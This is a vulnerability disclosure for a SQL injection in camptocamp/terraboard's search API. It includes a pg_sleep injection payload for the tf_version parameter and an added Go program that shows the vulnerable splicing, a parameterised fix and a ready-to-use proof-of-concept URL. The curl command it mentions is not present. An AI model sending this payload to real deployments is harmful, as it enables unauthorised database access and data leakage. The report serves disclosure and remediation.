SQL injection in camptocamp/terraboard
May 19th 2022
A SQL injection vulnerability exists in camptocamp/terraboard.
Among the APIs there is a route /api/search/attribute whose handler is api.SearchAttribute. api.SearchAttribute takes the request parameters and passes them into db.SearchAttribute. In db.SearchAttribute, when the request parameter lineage_value is set, execution reaches line 373 or 377 of that source file. Both lines build the SQL filter by dynamically splicing strings, which leads to SQL injection.
As an example, part of the code on line 373 reads:
fmt.Sprintf("states.tf_version LIKE '%s'", fmt.Sprintf("%%%s%%", v))
where the variable v is the request parameter tf_version, which is user controllable. When v is the following string:
v := "' OR pg_sleep(10) OR states.tf_version LIKE '%"
the SQL fragment becomes
"states.tf_version LIKE '%' OR pg_sleep(10) OR states.tf_version LIKE '%%'"
and PostgreSQL evaluates pg_sleep(10) as part of the query. Replacing pg_sleep with another statement leads to more serious consequences.
Proof of Concept
Run the following curl command; the request should take about 10 seconds to return a response. $DEMO_URL is the address and port of the application.
SQL injection can lead to sensitive data leakage and even the acquisition of server privileges.
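The following Go program is an added example, not code from the terraboard project or from the original report. It reproduces the string-splicing pattern quoted above so the resulting SQL text can be inspected, places a parameterised clause beside it (a hypothetical hardened form, not terraboard's actual fix), and builds the proof-of-concept request URL. The URL builder assumes tf_version is sent as a GET query-string parameter and that the base is the $DEMO_URL value; neither detail is stated on the page.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Payload is the constructed tf_version value from the report above.
const Payload = "' OR pg_sleep(10) OR states.tf_version LIKE '%"

// VulnerableFilter reproduces the splicing pattern quoted from
// db.SearchAttribute (line 373): the user value is pasted into the SQL text.
func VulnerableFilter(v string) string {
	return fmt.Sprintf("states.tf_version LIKE '%s'", fmt.Sprintf("%%%s%%", v))
}

// SafeFilter is a hypothetical hardened counterpart (not terraboard's code):
// the clause carries a bind placeholder and the value travels separately as
// an argument, so quotes inside v cannot change the query's structure.
func SafeFilter(v string) (clause string, args []interface{}) {
	return "states.tf_version LIKE ?", []interface{}{"%" + v + "%"}
}

// QuoteCount counts single quotes in a rendered clause. A single LIKE
// literal with quote-free data has exactly two; any more means user data
// containing a quote was spliced in raw and broke out of the literal.
func QuoteCount(sql string) int {
	return strings.Count(sql, "'")
}

// PoCURL builds the proof-of-concept request URL. Assumptions, not stated in
// the report: GET with a query-string parameter named tf_version, and base is
// the $DEMO_URL value (scheme, host and port).
func PoCURL(base, v string) string {
	q := url.Values{}
	q.Set("tf_version", v)
	return strings.TrimRight(base, "/") + "/api/search/attribute?" + q.Encode()
}

func main() {
	fmt.Println("vulnerable:", VulnerableFilter(Payload))
	clause, args := SafeFilter(Payload)
	fmt.Println("hardened:  ", clause, args)
	fmt.Println("PoC URL:   ", PoCURL("http://127.0.0.1:8080", Payload))
}
```

The vulnerable output is exactly the fragment shown above, with four quote characters where a benign LIKE literal has two; in the hardened form the clause text contains no quotes at all and the payload survives only as a bind argument. The URL builder percent-encodes the quotes, so the payload can be pasted straight into the curl invocation.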